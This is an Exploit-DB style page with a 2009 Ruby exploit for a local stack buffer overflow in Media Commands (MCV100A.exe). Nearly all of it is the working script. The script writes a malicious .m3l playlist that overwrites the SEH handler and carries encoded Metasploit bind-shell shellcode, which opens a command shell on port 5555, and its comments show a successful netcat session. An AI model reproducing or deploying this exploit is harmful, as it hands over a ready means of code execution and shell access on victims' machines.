Media Commands .m3l Local Buffer Overflow Exploit

vendor:

MCV100A.exe

by:

Mountassif Moad

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MCV100A.exe

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2009

Media Commands .m3l Local Buffer Overflow Exploit

This exploit is for a local buffer overflow vulnerability in Media Commands .m3l. The vulnerability is caused due to a boundary error when handling user supplied data. This can be exploited to cause a stack-based buffer overflow by sending an overly long string to the affected application. Successful exploitation of this vulnerability can result in arbitrary code execution in the context of the application.

Mitigation:

No known mitigation is available for this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/env ruby
# Media Commands .m3l Local Buffer Overflow Exploit
# By Mountassif Moad
# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
# C:\nc>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-f286641
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Media Commands\Animation>
# exit Booooooooooom
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.m3l'
time1 = Time.new
$VERBOSE=nil
Header =  
"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+
"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+
"\x4F\x66\x45\x6E\x74\x72\x69\x65"+
"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D"
# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
Shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+
"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+
"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+
"\x4f\x4f\x42\x4d\x5a"
Bof    =  "\x41" * 4097
Nseh = "\xEB\x06\x90\x90"
seh  = "\x35\x2F\xC6\x72"
Nop  = "\x90" * 15
crash =  Header + Bof + Nseh + seh + Nop + Shellcode
File.open( moad+".m3l", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".m3l :d"
end

# milw0rm.com [2009-03-05]